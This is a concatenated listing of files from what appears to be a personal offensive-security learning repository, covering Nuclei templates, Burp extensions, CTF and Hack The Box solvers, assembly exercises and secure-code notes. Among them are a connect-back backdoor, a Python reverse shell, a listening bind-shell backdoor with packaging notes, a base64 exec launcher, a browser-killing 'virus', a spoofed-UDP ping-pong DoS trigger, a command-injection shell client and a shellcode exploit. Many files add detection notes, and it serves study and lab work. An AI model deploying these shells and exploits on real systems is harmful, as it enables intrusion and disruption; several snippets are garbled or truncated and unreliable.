# second stage copying only build/prod would shrink the attack surface.
FROM alpine:latest

ENV GOPATH /go
# NOTE(review): brace expansion is a bash feature; under Alpine's /bin/sh this
# may create a literal "{bin,src}" entry instead of bin/ and src/ — verify.
RUN mkdir /go $GOPATH/{bin,src}
ENV PATH $GOPATH/bin:$PATH

WORKDIR /app

RUN apk add --no-cache --update git nodejs npm go
RUN npm install -g grunt-cli
# Unpinned clone of the default branch: builds are not reproducible and pull
# whatever is upstream at build time.
RUN git clone https://github.com/gchq/CyberChef.git cyberchef

WORKDIR /app/cyberchef

RUN npm install
RUN go install -v github.com/projectdiscovery/simplehttpserver/cmd/simplehttpserver@latest
RUN grunt prod

WORKDIR /app/cyberchef/build/prod

CMD [ "simplehttpserver", "-listen", ":8000", "-https"]

--------------------------------------------------------------------------------
/Defense/StoredProcedures/stored_procedure.py:
--------------------------------------------------------------------------------
# Example of calling a MySQL stored procedure through the connector's
# parameter binding instead of string-building SQL (the injection-safe
# pattern). The DB password comes from the MYSQL_PASS environment variable;
# the looked-up user's password, however, is taken from argv, where it is
# visible in `ps` output and shell history.
from mysql.connector import connect
from os import environ

def get_email_addr(cursor, stored_proc_name, *stored_proc_args):
    """Call `stored_proc_name` with `stored_proc_args` and print its result.

    callproc returns the (possibly updated) argument sequence; index 2 is the
    third argument, passed as None by the caller — presumably an OUT
    parameter the procedure fills with the e-mail address. Verify against
    the procedure definition."""
    result = cursor.callproc(stored_proc_name, [*stored_proc_args])
    email = result[2]
    print(email)

if __name__ == "__main__":
    from sys import argv
    username = argv[1]
    password = argv[2]

    # Connecting as root for a read-only lookup is more privilege than the
    # call needs; a dedicated account with EXECUTE on this procedure would do.
    mydb = connect(
        host="localhost",
        user="root",
        password=environ["MYSQL_PASS"],
        database="app")

    cursor = mydb.cursor()
    get_email_addr(cursor, "get_email_addr", username, password, None)
--------------------------------------------------------------------------------
/Misc/url_download.py:
--------------------------------------------------------------------------------
# Fetch a URL given on the command line and save its body in the current
# directory under the last path segment of the URL.
from requests import get
from sys import argv, exit

def download(source):
    """GET `source`; on HTTP 200 write the body to <last path segment>.

    Non-200 responses are silently ignored. The output name is derived from
    the URL without sanitising (a query string becomes part of the file
    name); no timeout is set and the whole body is held in memory."""
    response = get(source)
    print(f"[+] Getting {source} data")
    if response.status_code == 200:
        source_file_name = source.split("/")[-1]
        with open(source_file_name, "wb") as opened_file:
            opened_file.write(response.content)
        print(f"[+] Successfully downloaded {source}")

if __name__ == "__main__":
    # NOTE(review): argv always holds at least the script name, so this
    # check never fires and a missing URL raises IndexError on argv[1];
    # `len(argv) < 2` is the intended test. The usage placeholder after
    # argv[0] was lost when this listing was extracted.
    if len(argv) < 1:
        print(f"Usage: {argv[0]} ")
        exit(1)
    source = argv[1].rstrip("/")
    download(source)
--------------------------------------------------------------------------------
/Defense/Forensics/Python/TheRegistry/enumerate_windows_version.py:
--------------------------------------------------------------------------------
# Dump every value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
# (product name, build, install date, ...) for a quick forensic triage.
from winreg import (
    ConnectRegistry,
    OpenKey,
    KEY_ALL_ACCESS,
    EnumValue,
    QueryInfoKey,
    HKEY_LOCAL_MACHINE,
    HKEY_CURRENT_USER
)
if __name__ == "__main__":
    with ConnectRegistry(None, HKEY_LOCAL_MACHINE) as hive:
        # NOTE(review): KEY_ALL_ACCESS asks for write rights the script never
        # uses and fails without elevation; KEY_READ is sufficient for
        # enumeration. (`hosts_key` is a leftover name — this is not the
        # hosts file.) HKEY_CURRENT_USER is imported but unused.
        with OpenKey(hive, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion", 0, KEY_ALL_ACCESS) as hosts_key:
            num_of_values = QueryInfoKey(hosts_key)[1]  # (subkeys, values, mtime)
            for i in range(num_of_values):
                values = EnumValue(hosts_key, i)  # (name, data, type)
                print(values)
--------------------------------------------------------------------------------
/NucleiTemplates/aws-key-extractor.yaml:
--------------------------------------------------------------------------------
id: aws-key-extractor

info:
  name: AWS Key Extractor
  author: bin3xish477
  severity: high
  description: Discovers AWS access keys using regular expressions

# Matches the known AWS access-key-id prefixes (AKIA, ASIA, AROA, ...) followed
# by 16 upper-case alphanumerics. The same pattern is used once as the matcher
# (template fires) and once as the extractor (the key id is reported). Only
# the key *id* is found; a secret exposed alongside it is not captured here.
requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: regex
        part: body
        regex:
          - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
    extractors:
      - type: regex
        part: body
        regex:
          - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"

--------------------------------------------------------------------------------
/Burp/CustomActions/ArbitraryHeaderReflection.java:
--------------------------------------------------------------------------------
// Burp custom action: adds a throw-away request header and reports whether
// a header of the same name comes back in the response (a reflection that
// can be a first indicator of cache-poisoning or header-injection issues).
public var HEADER_NAME = "evil-header-1234";
boolean[] reflectsHeader = {false};

var headers = api().http().sendRequest(requestResponse.request().withAddedHeader(HEADER_NAME, "1337-gotcha")).response().headers();

for (HttpHeader header: headers) {
    if (reflectsHeader[0] == true) break;
    // NOTE(review): `==` compares String references, not contents, so this
    // test is false even when the name matches; String.equalsIgnoreCase()
    // is the right comparison (header names are case-insensitive).
    if (header.name() == HEADER_NAME) {
        reflectsHeader[0] = true;
    }
}

if (reflectsHeader[0] == true) {
    // NOTE(review): the format string has a %s but no argument, which throws
    // MissingFormatArgumentException; pass HEADER_NAME as the argument.
    logging().logToOutput(String.format("[+] the injected request header, %s, was successfully reflected in the response headers!"));
}
--------------------------------------------------------------------------------
/NucleiTemplates/host-header-ssrf.yaml:
--------------------------------------------------------------------------------
id: host-header-ssrf

info:
  name: Detect SSRF via HTTP Host Header
  author: bin3xish477
  severity: high
  description: Detects Server-side Request Forgery (SSRF) by injecting an interactsh URL into the Host header to detect for external service interactions
  tags: ssrf

# Any dns/http/smtp callback to the interactsh host counts as a hit. A DNS-only
# interaction can also come from a proxy or logging pipeline resolving the
# Host value, so triage dns-only results before rating them as SSRF.
requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      Host: "{{interactsh-url}}"
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
          - "smtp"
--------------------------------------------------------------------------------
/OffensiveGo/DNS/Clients/ARecordQueries/main.go:
--------------------------------------------------------------------------------
// Looks up the A records of a hard-coded name against Cloudflare's resolver
// and prints each address. Any transport error is fatal (panic).
package main

import (
	"fmt"

	"github.com/miekg/dns"
)

func main() {
	cloudFlare := "1.1.1.1:53"
	var msg dns.Msg
	fqdn := dns.Fqdn("binexishatt.site") // ensures the trailing dot
	msg.SetQuestion(fqdn, dns.TypeA)
	resp, err := dns.Exchange(&msg, cloudFlare) // single UDP exchange, no TCP fallback
	if err != nil {
		panic(err)
	}

	if len(resp.Answer) < 1 {
		fmt.Println("No records returned...")
		return
	}

	fmt.Println("(A):")
	for _, answer := range resp.Answer {
		// CNAME or other RR types in the answer section are skipped.
		if a, ok := answer.(*dns.A); ok {
			fmt.Printf("\t%s\n", a.A)
		}
	}
}
--------------------------------------------------------------------------------
/WebAppSecurity/owasp-api-top-ten/README.md:
--------------------------------------------------------------------------------
# OWASP API Security Top 10 - 2019

### Broken Object Level Authorization

### Broken User Authentication

### Excessive Data Exposure

### Lack of Resources & Rate Limiting

### Broken Function Level Authorization

### Mass Assignment

### Secure Misconfiguration

### Injection

### Improper Assets Management

### Insufficient Loggin & Monitoring

### Resources

- [OWASP API Security Top Ten PDF](https://raw.githubusercontent.com/OWASP/API-Security/master/2019/en/dist/owasp-api-security-top-10.pdf)
--------------------------------------------------------------------------------
/OffensiveGo/DLL/DLLInjection/main.go:
--------------------------------------------------------------------------------
// Stub: resolves the kernel32 procedures used for classic remote-thread DLL
// injection (OpenProcess / VirtualAllocEx / WriteProcessMemory /
// CreateRemoteThread) but main() does nothing yet. From the defender's side,
// this call sequence against another process is what EDR API hooks and
// Sysmon's CreateRemoteThread event (ID 8) are built to surface.
package main

import (
	"syscall"
)

var (
	kern32 = syscall.NewLazyDLL("Kernel32.dll")

	// imported functions from kernel32.dll (resolved lazily on first Call)
	openProcess        = kern32.NewProc("OpenProcess")
	getProcAddress     = kern32.NewProc("GetProcAddress")
	virtualAllocEx     = kern32.NewProc("VirtualAllocEx")
	createRemoteThread = kern32.NewProc("CreateRemoteThread")
	writeProcessMemory = kern32.NewProc("WriteProcessMemory")
	resumeThread       = kern32.NewProc("ResumeThread")
	closeHandle        = kern32.NewProc("CloseHandle")
)

func main() {
}
--------------------------------------------------------------------------------
/SLAE/TheStack/stack.nasm:
--------------------------------------------------------------------------------
; Author : Alexis Rodriguez
; Date : 06/29/2020
; File : stack.nasm
; IS : x86 Assembly
;
; Exercises push/pop with 16- and 32-bit registers and memory operands.
; Note that `push word` followed by `pop ecx` pushes 2 bytes and pops 4,
; leaving esp 2 bytes above where it started — presumably intentional, to
; observe the effect in a debugger.

global _start

section .text
_start:
	mov eax, 0x66778899
	mov ebx, 0x0
	mov ecx, 0x0

	; push and pop of r/m16 and r/m32
	; register push and pop
	push ax
	pop bx

	push eax
	pop ecx

	; memory push and pop
	push word [sample]
	pop ecx

	push dword [sample]
	pop edx

	; exit program (sys_exit, status 0)
	mov eax, 0x1
	mov ebx, 0x0
	int 0x80

section .data
	sample: db 0xaa, 0xbb, 0xcc, 0xdd
--------------------------------------------------------------------------------
/Misc/ArtOfExploitation/CProgramming/Misc/func_ptrs.c:
--------------------------------------------------------------------------------
// Demonstrates calling through a function pointer. The header name after
// #include was lost when this listing was extracted.
#include 

int func_one()
{
    printf("This is function one\n");
    return 1;
}

int func_two()
{
    // NOTE(review): copy-paste leftover — this message also says "one".
    printf("This is function one\n");
    return 2;
}

int main()
{
    int v;
    int (*func_ptr) ();

    func_ptr=func_one;
    // Printing a pointer with %08x is undefined behaviour and truncates on
    // 64-bit; %p (or a cast to uintptr_t) is the portable form.
    printf("func_ptr is 0x%08x\n", func_ptr);
    v=func_ptr();
    printf("Value returned: %d\n", v);

    func_ptr=func_two;
    printf("func_ptr is 0x%08x\n", func_ptr);
    v=func_ptr();
    printf("Value returned: %d\n", v);
    return 0;
}
--------------------------------------------------------------------------------
/Misc/UDPPingPongAttack/ping_pong_trigger.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

"""
1. Run udp_server.py on two different computers
2. Change src and dst address in IP header to
   IP addresses of computer's running udp_server.py
3. Run ping_pong_trigger.py
"""
from scapy.all import *

def trigger_ping_pong_attack():
    """Send one spoofed UDP datagram (src = server A, dst = server B, both on
    port 1234). Because udp_server.py answers every datagram back to the
    sender's IP on its fixed PORT, the two servers then reply to each other
    indefinitely — the classic UDP "ping-pong" loop. Spoofing the source
    needs raw-socket privileges."""
    print("[+] Triggering UDP Ping Pong Attack...")
    ip = IP(src='192.168.33.135', dst='192.168.33.138')
    udp = UDP(sport=1234, dport=1234)
    data = "Let's play some udp ping pong\n"
    pkt = ip/udp/data
    send(pkt, verbose=0)

if __name__ == '__main__':
    trigger_ping_pong_attack()
--------------------------------------------------------------------------------
/Misc/UDPPingPongAttack/udp_server.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Deliberately naive UDP service used by the ping-pong demo. The reply goes
# to the sender's IP but to the *fixed* PORT rather than the datagram's
# source port, which is what lets two instances feed each other forever once
# a spoofed packet kicks it off. Services that answer unsolicited UDP should
# reply to the source port, drop packets whose source port is a known service
# port, and rate-limit responses.

from socket import socket, AF_INET, SOCK_DGRAM
from time import sleep

IP = "0.0.0.0"
PORT = 1234

def start_server():
    """Bind to all interfaces on PORT and answer every datagram after a 1 s
    pause. Runs forever; the socket is never closed explicitly."""
    sock = socket(AF_INET, SOCK_DGRAM)
    # no use of listen or accept() in udp servers
    # b/c udp is connectionless
    sock.bind((IP, PORT))

    while True:
        data, (ip, port) = sock.recvfrom(1024)
        data = data.decode("utf-8")  # raises on non-UTF-8 payloads
        print(f"From {ip}:{port} :")
        print(f"Message: {data}")
        sleep(1)
        sock.sendto(b'Thank you for the message', (ip, PORT))

if __name__ == '__main__':
    start_server()
--------------------------------------------------------------------------------
/tools.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Installs a set of projectdiscovery CLI tools with `go install ...@latest`.
# "@latest" is unpinned, so every run may fetch a different version; pin tags
# for reproducible tooling.

if ! command -v go &> /dev/null
then
    echo "[x] missing go installation..."
    exit 1
fi

tools=(
    "httpx"
    "asnmap"
    "subfinder"
    "interactsh-client"
    "mapcidr"
    "cdncheck"
    "tlsx"
    "proxify"
    "dnsx"
)

for tool in ${tools[@]}
do
    if [[ $tool = "interactsh-client" ]]
    then
        # interactsh-client lives as a sub tool of the interactsh repo
        go install -v "github.com/projectdiscovery/interactsh/cmd/${tool}@latest"
    else
        go install -v "github.com/projectdiscovery/${tool}/cmd/${tool}@latest"
    fi
done
--------------------------------------------------------------------------------
/Burp/Bambdas/filterOutImages.json:
--------------------------------------------------------------------------------
{
  "bambda":{
    "http_history_display_filter":{
      "bambda":"// ignore entry if no response returned\r\nif (!requestResponse.hasResponse()) return false;\r\n\r\nHttpRequest request = requestResponse.request();\r\nString url = request.url();\r\nMatcher matcher = Pattern.compile(\"portswigger\\\\.net\").matcher(url);\r\n\r\nreturn matcher.find() &&\r\n request.hasHeader(\"cookie\") &&\r\n !request.path().matches(\".*(\\\\.(png|svg|jpg|tiff|webp|ico|woff2?))\");\r\n\r\n// FOR IN SCOPE ITEMS\r\n//return request.isInScope() &&\r\n// !request.path().matches(\".*(\\\\.(png|svg|jpg|tiff|webp|ico|woff2?))\");"
    }
  }
}
--------------------------------------------------------------------------------
/PyViruses/BrowserObstruction/obstruct_browsing.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

""" A very simple virus that scans a Linux system for any running browsers and terminates them """

# Every 10 s, SIGTERM any process whose name is exactly 'chrome' or
# 'firefox-esr'. Only processes the current user may signal are affected
# (kill raises PermissionError otherwise, which is not caught). getuid and
# setuid are imported but unused.
from psutil import process_iter
from os import kill, getuid, setuid
from signal import SIGTERM
from time import sleep

if __name__ == "__main__":
    target_browser_executables = ('chrome', 'firefox-esr')

    while True:
        running_processes = {p.pid: p.info['name'] for p in process_iter(["pid", "name"])}
        for pid, p_name in running_processes.items():
            if p_name in target_browser_executables:
                kill(pid, SIGTERM)
        sleep(10)
--------------------------------------------------------------------------------
/Burp/Bambdas/IdentifyCachingOracles.java:
--------------------------------------------------------------------------------
// Proxy-history bambda: highlights and annotates any entry whose response
// carries a Cache-Control header that is both `public` and has a `max-age`,
// i.e. a response a shared cache is allowed to store. Always returns true
// once a response exists, so it annotates rather than filters.
if (!requestResponse.hasResponse()) {
    return false;
}

var respHeaders = requestResponse.response().headers();
respHeaders.forEach(header -> {
    // Case-insensitive; two lookaheads so `public` and `max-age=N` may appear
    // in either order. Compiled per header — hoisting the Pattern out of the
    // loop would avoid recompiling it for every header of every entry.
    String regex = "(?i)cache-control\\s*:\\s*(?=.*\\bpublic\\b)(?=.*\\bmax-age\\s*=\\s*\\d+).*";
    P  attern pattern = Pattern.compile(regex);
    Matcher matcher = pattern.matcher(header.toString());
    if (matcher.matches()) {
        requestResponse.annotations().setHighlightColor(HighlightColor.MAGENTA);
        requestResponse.annotations().setNotes("[+] This resource is being cached! Analyse for cache deception/poisoning");
    }
});

return true;
--------------------------------------------------------------------------------
/HackTheBox/Fortune/cmd_inject.py:
--------------------------------------------------------------------------------
# Interactive client for the command-injection flaw in the (retired) HTB
# "Fortune" box: each line typed at the prompt is appended to the `db` form
# field and the command output is scraped from the response body.
from requests import post
from re import search, DOTALL
from cmd import Cmd
from sys import exit

class Shell(Cmd):
    prompt = "> "
    def default(self, args):
        """Every non-builtin line goes to run_cmd."""
        self.run_cmd(args)

    def run_cmd(self, cmd):
        """POST the injected command and print what the page echoes back
        ("X" when the expected output block is absent). Typing `exit` ends
        the session."""
        if cmd.strip() == "exit":
            exit(1)
        target_url = "http://10.10.10.127/select"
        data_injection = {"db": f"test; {cmd}"}
        resp = post(target_url, data=data_injection)
        # NOTE: the HTML tag names that delimit (.*) were lost when this
        # listing was extracted, which is why the pattern is split here.
        output = search(r"
(.*)
", resp.text, DOTALL)
        if output:
            print(output.group(1).strip('\n'))
        else:
            print("X")

if __name__ == '__main__':
    shell = Shell()
    shell.cmdloop()
--------------------------------------------------------------------------------
/Misc/simple_backdoor.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

'''
Name : Alexis Rodriguez
Date : 2020-02-16
Description : simple backdoor
'''

# Connect-back shell: opens a TCP connection to IP:PORT from argv, then hands
# each received buffer to the shell and sends the output back until the peer
# closes the connection (an empty recv ends the loop).
# Detection: a python process with an outbound connection that repeatedly
# spawns `/bin/sh -c` children; egress filtering and process-ancestry rules
# catch this pattern.
import socket as sck
import subprocess as subp
import sys

def initiate():
    """Connect to (argv[1], int(argv[2])) and serve commands until the remote
    side disconnects."""
    BUFFER = 4096
    IP, PORT = sys.argv[1], int(sys.argv[2])
    with sck.socket(sck.AF_INET, sck.SOCK_STREAM) as sock:
        sock.connect((IP, PORT))
        COMMAND = True
        while COMMAND:
            COMMAND = sock.recv(BUFFER)
            RESULT = exe_cmd(COMMAND)
            sock.send(RESULT)

def exe_cmd(COMMAND):
    """Intended to run COMMAND through the shell and return its output."""
    return subp.check_out(COMMAND, shell=True)
--------------------------------------------------------------------------------
/CTFs/TenableCTF/RanEncryptionFixed/ref.py:
--------------------------------------------------------------------------------
# CTF solver: for each ciphertext byte, re-seed `random` with the recorded
# seed, take four randint(0,255) draws and XOR the byte with the (i mod 4)-th
# draw — i.e. replay the challenge's keystream. `flag` and the first `_flag`
# are leftovers and unused.
import random

flag = "flag{not_the_flag}"
seeds = [9925, 8861, 5738, 1649, 2696, 6926, 1839, 7825, 6434, 9699, 227, 7379, 9024, 817, 4022, 7129, 1096, 4149, 6147, 2966, 1027, 4350, 4272]
res = [184, 161, 235, 97, 140, 111, 84, 182, 162, 135, 76, 10, 69, 246, 195, 152, 133, 88, 229, 104, 111, 22, 39]
xored = []

_flag = ""
for i in range(0, len(res)):
    random.seed(seeds[i])
    rands = []
    for j in range(0,4):
        rands.append(random.randint(0,255))
    xored.append(rands[i%4])  # the (i mod 4)-th draw is the keystream byte

real_flag = ""
for r, x in zip(res, xored):
    real_flag += chr(r ^ x)
print(real_flag)
--------------------------------------------------------------------------------
/SecureCodeReview/container-attack-surface-minimization/README.md: 
--------------------------------------------------------------------------------
# Container Attack Surface Minimization

The [secure-go-build-example.dockerfile](https://github.com/bin3xish477/CyberSecurity/blob/master/SecureCodeReview/container-attack-surface-minimization/secure-go-build-example.dockerfile) file implements a multi-stage Dockerfile that deploys the app in a container based on Docker's `scratch` image, which is a minimal image from which other images are built on top of - it contains no files/folders. The attack surface of the container is drastically reduced and the efforts of a threat actor whose compromised the application and has managed to gain access to the underlying container are thwarted.

--------------------------------------------------------------------------------
/Phishing/Gophish/user-data.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# EC2 user-data: installs and starts Gophish and MailHog under /opt. Runs as
# root at first boot; both binaries are downloaded without a hash check and
# left running in the background with no service unit, so they do not
# survive a reboot.

gophish_setup() {
    mkdir /opt/gophish
    cd /opt/gophish
    wget -O gophish.zip 'https://github.com/gophish/gophish/releases/download/v0.11.0/gophish-v0.11.0-linux-64bit.zip'
    unzip gophish.zip
    rm gophish.zip
    # Rewrites every 127.0.0.1 in config.json to 0.0.0.0, which presumably
    # exposes the admin UI (not only the phishing listener) on all
    # interfaces; the security group / NACLs in this module are then the only
    # thing keeping it off the internet. Keeping the admin server on loopback
    # and reaching it over an SSH tunnel is the tighter option.
    sed -i 's|127\.0\.0\.1|0\.0\.0\.0|g' config.json
    chmod +x ./gophish
    ./gophish &
}

mailhog_setup() {
    # Use mailhog as the sending SMTP server
    mkdir /opt/mailhog
    cd /opt/mailhog
    wget -O mailhog 'https://github.com/mailhog/MailHog/releases/download/v1.0.1/MailHog_linux_amd64'
    chmod +x ./mailhog
    ./mailhog &
}

gophish_setup
mailhog_setup
--------------------------------------------------------------------------------
/PhysicalPentestStuff/rubberDucky/scripts/quick-gather.txt:
--------------------------------------------------------------------------------
REM --------------------------------------------------------------
REM A ducky script to quickly view important computer information.
REM Must run as admin!
REM --------------------------------------------------------------
REM Opens a cmd window via Win+R and types a series of enumeration
REM commands (whoami, ipconfig, wlan interface, disk space, systeminfo,
REM tasklist). Output stays on screen; nothing is written or exfiltrated.
REM Defender note: USB device-control policy and alerting on newly
REM enumerated HID keyboards are the usual controls for this class.
GUI r
DELAY 500
STRING cmd
DELAY 1000
STRING echo Host: && whoami
DELAY 500
STRING echo Ipconfig data: && ipconfig /all
DELAY 500
STRING echo Network interface info: && netsh wlan show interface
DELAY 500
STRING echo C: volume details && fsutil volume diskfree c:
DELAY 1000
STRING echo Systeminfo && systeminfo
DELAY 10000
STRING tasklist
REM End
--------------------------------------------------------------------------------
/Misc/DFIR-Tools/colors.py:
--------------------------------------------------------------------------------
# ANSI colour helpers built on the `colored` package: each fg helper prefixes
# the text with a colour code and does NOT reset it; `normal` appends the
# reset, `bold`/`bkgrd` append a reset at the end.
from colored import fg, attr, bg

# regular colors (presumably 256-colour palette indices)
r, e, b, p, o, y, g, w, k = 196, 76, 33, 135, 208, 226, 245, 255, 0

red = lambda s: "%s%s" % (fg(r), s)
green = lambda s: "%s%s" % (fg(e), s)
blue = lambda s: "%s%s" % (fg(b), s)
purple = lambda s: "%s%s" % (fg(p), s)
orange = lambda s: "%s%s" % (fg(o), s)
yellow = lambda s: "%s%s" % (fg(y), s)
grey = lambda s: "%s%s" % (fg(g), s)
black = lambda s: "%s%s" % (fg(k), s)
white = lambda s: "%s%s" % (fg(w), s)

normal = lambda s: "%s%s" % (s, attr(0))
# NOTE(review): the bold attribute is emitted *after* the text, so `s` itself
# is not rendered bold — only whatever follows before the reset.
bold = lambda s: "%s%s%s" % (s, attr('bold'), attr('reset'))
bkgrd = lambda s, color: "%s%s%s" % (bg(color), s, attr('reset'))
--------------------------------------------------------------------------------
/Misc/python_reverse_shell.py:
--------------------------------------------------------------------------------
# Reverse shell: connects out to port 7777, duplicates the socket over
# fds 0-2 and spawns an interactive /bin/sh on it, then lists this process's
# fd table after the shell exits. Detection: a shell whose stdin/stdout/
# stderr are a socket (visible under /proc/<pid>/fd; auditd/EDR "shell with
# network stdio" rules) and an unexplained outbound connection from python.
import socket
import subprocess
import os

pid = os.getpid()
print(pid)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 7777))  # host left empty in this copy
# overwrite the original stdin fd
os.dup2(s.fileno(), 0)
# overwrite the original stdout fd
os.dup2(s.fileno(), 1)
# overwrite the original stderr fd
os.dup2(s.fileno(), 2)

# by overwriting the original file descriptors
# we attach stdin, stdout, and stderr to the socket connection
# and then the shell that we spawn will inherit the original
# sockets file descriptors
p = subprocess.call(["/bin/sh", "-i"])

os.system("ls -l /proc/%s/fd" % pid)
--------------------------------------------------------------------------------
/PyPersistence/PersistenceViaWindowsRegistry/simple_backdoor.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Bind shell: listens on 0.0.0.0:2525, accepts a single client and runs each
# received line (split on whitespace, no shell) until the loop is broken by
# an exception. Only stdout of commands that exit 0 is returned; nothing is
# sent on failure. Detection: an unexpected listening port owned by a python
# process and, per the directory name, presumably a registry autorun entry
# pointing at the compiled binary.
from socket import socket, AF_INET, SOCK_STREAM
from subprocess import run, PIPE
from os import _exit

# pip install -U nuitka
# nuitka3 simple_backdoor.py --standalone
# or
# pyinstaller --onefile --noconsole simple_backdoor.py

def main():
    with socket(AF_INET, SOCK_STREAM) as soc:
        soc.bind(("0.0.0.0", 2525))
        soc.listen(5)
        conn, _ = soc.accept()
        while True:
            cmd = conn.recv(1024).decode("utf-8").strip()
            cmd_output = run(cmd.split(), stdout=PIPE, stderr=PIPE)
            if cmd_output.returncode == 0:
                conn.send(bytes(cmd_output.stdout, "utf-8"))
main()
--------------------------------------------------------------------------------
/OffensiveGo/SliverStager/go.sum:
--------------------------------------------------------------------------------
github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf h1:Cx4YJvjPZD91xiffqJOq8l3j1YKcvx3+8duqq7DX9gY=
github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ=
github.com/Binject/go-donut v0.0.0-20210701074227-67a31e2d883e h1:ytVmxGQuS7ELO/WpvH6iuY1hVcJ6iOTw3VLOOIFlo8o=
github.com/Binject/go-donut v0.0.0-20210701074227-67a31e2d883e/go.mod h1:dc3mUnr4KTKcFKVq7BVbHGF0xAHrIyooQ+VTO7/bIZw=
github.com/akamensky/argparse v1.3.0/go.mod h1:S5kwC7IuDcEr5VeXtGPRVZ5o/FdhcMlQz4IZQuw64xA=
github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs=
github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
--------------------------------------------------------------------------------
/DockerStuff/C2Deployments/nginx/index.html:
--------------------------------------------------------------------------------



Welcome to nginx!




Welcome to nginx!


If you see this page, the nginx web server is successfully installed and 14 | working. Further configuration is required.


For online documentation and support please refer to 17 | nginx.org.
18 | Commercial support is available at 19 | nginx.com.


Thank you for using nginx.




--------------------------------------------------------------------------------
/PyViruses/PyBackdoorInjection/test/test1.py:
--------------------------------------------------------------------------------


# Launcher stub: decodes a base64 blob and exec()s it in a backgrounded
# python3 process started through the shell. The payload is redacted in this
# listing. Detection: `python3 -c` with a2b_base64/exec in the command line
# is a high-signal pattern for command-line logging (auditd execve on Linux,
# Sysmon process-creation events on Windows).
from subprocess import run
run("""python3 -c "from binascii import a2b_base64;exec(a2b_base64('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'))" &""",shell=True)
--------------------------------------------------------------------------------
/SecureCodeReview/ruby/command-injection/README.md:
--------------------------------------------------------------------------------
# Ruby Command Injection Functions

The following Ruby functions can be used to execute system commands and should be avoided if possible:

```ruby
eval("ruby code here")
system("os command here")
`ls -al /` # (backticks contain os command)
exec("os command here")
spawn("os command here")
open("| os command here")
Process.exec("os command here")
Process.spawn("os command here")
IO.binread("| os command here")
IO.binwrite("| os command here", "foo")
IO.foreach("| os command here") {}
IO.popen("os command here")
IO.read("| os command here")
IO.readlines("| os command here")
IO.write("| os command here", "foo")
```
--------------------------------------------------------------------------------
/Misc/ArtOfExploitation/Exploitation/exploit_notesearch_env.c:
--------------------------------------------------------------------------------
// Exploit from "Hacking: The Art of Exploitation" (notesearch, environment
// variant). Header names after #include were lost when this listing was
// extracted.
#include 
#include 
#include 
#include 

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[])
{
    char *env[2]={shellcode, 0};
    unsigned int i, ret;
    char *buffer=(char *)malloc(160);

    ret=0xbffffffa-(sizeof(shellcode)-1)-strlen("./notesearch");
    for(i=0; i<160; i+=4)
        *((unsigned int *)(buffer+i))=ret;

    execle("./notesearch", "notesearch", buffer, 0, env);
    free(buffer);  // only reached if execle fails
    return 0;
}
--------------------------------------------------------------------------------
/SecureCodeReview/code-samples/sample.2.java:
--------------------------------------------------------------------------------
/* Can you spot the vulnerability?? */

/* Generates a fresh 16-byte session id, retrying until it is not already in
 * the cache, under this.lock. What to check: `PBPSessionManager.random` is
 * defined elsewhere — if it is a java.util.Random rather than SecureRandom,
 * session ids are predictable, which is presumably the defect being asked
 * for. (As transcribed the sample also has two missing semicolons and a
 * `boolean` initialised to null, so it is not compilable as-is.) */
public String addNewSession() {
    this.lock.lock()
    final byte[] bytes = new byte[16];
    boolean isJSessionIdFoundInCache = null;
    String newJSessionId = null;

    try {
        do {
            PBPSessionManager.random.nextBytes(bytes);
            newJSessionId = Hex.encodeHexString(bytes);
            isJSessionIdFoundInCache = (this.jsessionCache.get(newJSessionId) != null);
        } while (isJSessionIdFoundInCache);

        final JSession jSession = new JSession(newJSessionId);
        this.jsessionCache.put(newJSessionId, jSession);
        return newJSessionId;

    } finally {
        this.lock.unlock()
    }
}

--------------------------------------------------------------------------------
/SLAE/Logical/logical.nasm:
--------------------------------------------------------------------------------
; Author : Alexis Rodriguez
; Date : 06/30/2020
; File : logical.nasm
; IS : x86 Assembly
;
; Exercises AND/OR/XOR/NOT on registers and memory operands. The two XORs
; with the same constant and the two NOTs cancel out, leaving var3 and eax
; unchanged — useful to single-step in a debugger.

global _start

section .text
_start:
	; AND
	mov al, 0x10
	and al, 0x01

	and byte [var1], 0xaa
	and word [var2], 0x1122

	; OR
	mov al, 0x10
	or al, 0x01

	or byte [var1], 0xaa

	mov eax, 0x0
	or eax, 0x0

	; XOR
	xor dword [var3], 0x11223344
	xor dword [var3], 0x11223344

	; NOT
	mov eax, 0xFFFFFFFF
	not eax
	not eax

	; exit program (sys_exit, status 0)
	mov eax, 0x1
	mov ebx, 0x0
	int 0x80

section .data
	var1: db 0xaa
	var2: dw 0xbbcc
	var3: dd 0x11223344

--------------------------------------------------------------------------------
/Cryptography/MoreThanSecrecy/cracking_caesar.py:
--------------------------------------------------------------------------------
# Brute-force a Caesar cipher: yield the plaintext candidate for every shift
# and let the reader pick the one that reads as English.
from string import ascii_lowercase as alphabet
from sys import argv, exit

def crack_caesar(cipher):
